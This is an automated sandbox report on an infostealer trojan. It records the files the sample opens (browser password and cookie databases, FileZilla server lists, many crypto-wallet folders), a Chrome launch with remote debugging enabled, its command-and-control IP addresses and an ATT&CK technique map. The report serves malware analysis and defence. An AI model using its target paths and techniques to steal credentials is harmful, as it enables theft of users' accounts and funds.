          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Exodus\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\MultiDoge\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Binance\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
          Source: Fine.com Binary or memory string: WIN_81
          Source: Fine.com Binary or memory string: WIN_XP
          Source: Fine.com.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: Fine.com Binary or memory string: WIN_XPe
          Source: Fine.com Binary or memory string: WIN_VISTA
          Source: Fine.com Binary or memory string: WIN_7
          Source: Fine.com Binary or memory string: WIN_8
          Source: Yara match File source: 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: Fine.com PID: 1440, type: MEMORYSTR

          Remote Access Functionality

          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Source: Yara match File source: sslproxydump.pcap, type: PCAP
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_00252263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 11_2_00252263
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_00251C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 11_2_00251C61
          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
          Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
          Execution: 1 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
          Persistence: 1 DLL Side-Loading; 2 Valid Accounts; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
          Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Extra Window Memory Injection; 2 Valid Accounts; 21 Access Token Manipulation; 12 Process Injection; 1 Registry Run Keys / Startup Folder; Scheduled Task/Job; At; Cron; Launchd
          Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Extra Window Memory Injection; 111 Masquerading; 2 Valid Accounts; 1 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 12 Process Injection
          Credential Access: 2 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
          Discovery: 2 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 27 System Information Discovery; 1 Query Registry; 121 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; System Network Connections Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
          Collection: 1 Archive Collected Data; 4 Data from Local System; 21 Input Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
          Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 1 Remote Access Software; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
          Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
          [Behavior graph: ID 1589496, Sample: mNPTwHOuvT.exe, Start date: 12/01/2025, Architecture: WINDOWS, Score: 100]

          Source | Detection | Scanner | Label | Link
          mNPTwHOuvT.exe | 58% | Virustotal | | Browse
          mNPTwHOuvT.exe | 47% | ReversingLabs | Win32.Trojan.Etset |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\424372\Fine.com | 0% | ReversingLabs | |

          No Antivirus matches
          No Antivirus matches

          Source | Detection | Scanner | Label | Link
          https://195.201.141.106/q | 0% | Avira URL Cloud | safe |
          https://195.201.141.106Local | 0% | Avira URL Cloud | safe |
          https://116.203.165.251 | 0% | Avira URL Cloud | safe |
          https://195.201.141.106R9 | 0% | Avira URL Cloud | safe |
                                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.20.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Fine.com, 0000000B.00000002.2938149780.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.dr, Web Data.20.dr, XLFUAS.11.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.autoitscript.com/autoit3/XFine.com, 0000000B.00000000.2087146090.00000000002A5000.00000002.00000001.01000000.00000009.sdmp, Closely.0.dr, Fine.com.2.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://issuetracker.google.com/161903006chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.ecosia.org/newtab/Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://drive-daily-1.corp.google.com/chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://195.201.141.106/qFine.com, 0000000B.00000002.2935633690.0000000000E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://excel.new?from=EdgeM365Shoreline13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://drive-daily-5.corp.google.com/chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://anglebug.com/3078chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://anglebug.com/7553chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://anglebug.com/5375chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://anglebug.com/5371chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://anglebug.com/4722chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://anglebug.com/7556chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refFine.com, 0000000B.00000002.2935633690.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, DJMYUA.11.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://chromewebstore.google.com/msedge.exe, 00000013.00000002.2740945971.000039F800020000.00000004.00000800.00020000.00000000.sdmp, manifest.json.20.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://drive-preprod.corp.google.com/chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Fine.com, 0000000B.00000002.2935633690.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, DJMYUA.11.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://msn.comXIDv10Cookies.22.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://bard.google.com/13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://116.203.165.251Fine.com, 0000000B.00000003.2441321400.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2935633690.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.0000000004010000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441368651.0000000004035000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441264032.0000000004313000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2939843523.0000000004311000.00000040.00001000.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441646535.00000000040BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/%chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://anglebug.com/6692chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://issuetracker.google.com/258207403chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://anglebug.com/3502chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://anglebug.com/3623chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://www.office.com13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://anglebug.com/3625chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://outlook.live.com/mail/0/13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://anglebug.com/3624chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://docs.google.com/presentation/Jchrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    http://anglebug.com/5007chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiDJMYUA.11.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.228 | www.google.com | United States | 15169 | GOOGLEUS | false
172.217.18.14 | play.google.com | United States | 15169 | GOOGLEUS | false
23.49.251.20 | unknown | United States | 16625 | AKAMAI-ASUS | false
18.244.18.27 | sb.scorecardresearch.com | United States | 16509 | AMAZON-02US | false
18.238.49.99 | unknown | United States | 16509 | AMAZON-02US | false
23.43.85.42 | unknown | United States | 3257 | GTT-BACKBONEGTTDE | false
162.159.61.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
195.201.141.106 | unknown | Germany | 24940 | HETZNER-ASDE | true
                                                                                                                                                                                                                                        20.110.205.119
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        204.79.197.219
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        172.64.41.3
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        13.89.179.13
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        142.250.185.110
                                                                                                                                                                                                                                        plus.l.google.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        23.43.85.10
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        3257GTT-BACKBONEGTTDEfalse
                                                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                                                        unknownReserved
                                                                                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                                                                                        142.250.185.97
                                                                                                                                                                                                                                        googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                        192.168.2.5
                                                                                                                                                                                                                                        127.0.0.1

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589496
Start date and time: 2025-01-12 17:21:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: mNPTwHOuvT.exe
renamed because original name is a hash value
Original Sample Name: 2db319e8bfd0b40bb3ac999cf4e6670c.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@89/291@27/18
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 76
• Number of non-executed functions: 305
Cookbook Comments:
• Found application associated with file extension: .exe
